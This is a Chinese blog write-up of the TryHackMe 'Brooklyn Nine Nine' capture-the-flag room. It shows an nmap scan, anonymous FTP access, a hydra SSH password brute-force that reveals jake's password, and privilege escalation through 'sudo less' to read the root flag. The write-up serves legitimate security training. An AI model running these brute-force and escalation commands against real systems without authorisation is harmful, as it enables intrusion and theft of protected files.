TryHackMe-Brooklyn Nine Nine

发布于 2023-09-28  288 次阅读


简介:

这个房间是针对初级黑客的,但任何人都可以尝试破解这个盒子。有两种主要的方式来root这个盒子。

房间链接:

https://tryhackme.com/room/brooklynninenine#

问题:

挑战开始:

首先扫描下端口

└─# nmap -sC -sV 10.10.129.244
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-28 07:02 UTC
Nmap scan report for ip-10-10-129-244.eu-west-1.compute.internal (10.10.129.244)
Host is up (0.0051s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.101.255
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 167f2ffe0fba98777d6d3eb62572c6a3 (RSA)
|   256 2e3b61594bc429b5e858396f6fe99bee (ECDSA)
|_  256 ab162e79203c9b0a019c8c4426015804 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 02:7C:CE:CE:E4:E1 (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.22 seconds

可以看到ftp可以匿名登录,并且有一个文件
下载到本地查看

发现有提示

这里意思是jake的密码太弱了
那么我们可以尝试爆破ssh
这里使用hydra

└─# hydra -l jake -w 10 -P /usr/share/wordlists/rockyou.txt -t 10 -f 10.10.129.244 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-28 07:16:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://10.10.129.244:22/
[22][ssh] host: 10.10.129.244   login: jake   password: 987654321
[STATUS] attack finished for 10.10.129.244 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-28 07:16:57

这里成功爆破出密码
尝试ssh登陆,成功登陆

查看了下用户,发现有三个用户

成功在holt用户下找到user flag

接着尝试提权

可以发现less可以免密sudo
查询了下用法

直接读取root flag
sudo less /root/root.txt
成功读取root.txt

当然了,也可以用suid提权

less /root/root.txt

届ける言葉を今は育ててる
最后更新于 2023-09-28